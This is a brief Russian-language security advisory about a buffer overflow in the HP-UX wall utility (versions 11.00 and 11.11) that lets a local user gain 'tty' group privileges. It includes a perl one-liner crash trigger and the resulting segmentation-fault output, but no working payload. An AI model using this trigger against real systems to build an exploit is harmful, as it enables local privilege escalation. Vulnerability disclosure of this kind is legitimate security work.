Переполнение буфера обнаружено в /usr/sbin/wall в операционной системе HP/UX. Локальный пользователь может выполнить произвольный код с
повышенными привилегиями.
Сообщается, что локальный пользователь может вызвать переполнение буфера, создавая специально обработанный файл, который будет широковещательно передан утилите wall. Уязвимость позволяет локальному пользователю выполнить произвольный код с привилегиями 'tty' группы.
Пример:
(Tested on HPUX 11.11)
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
Memory fault
(Tested on HPUX 11.00)
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
bash-2.04$ /usr/sbin/wall /tmp/out
Segmentation fault
Уязвимость обнаружена в HP/UX 11.11, 11.00.
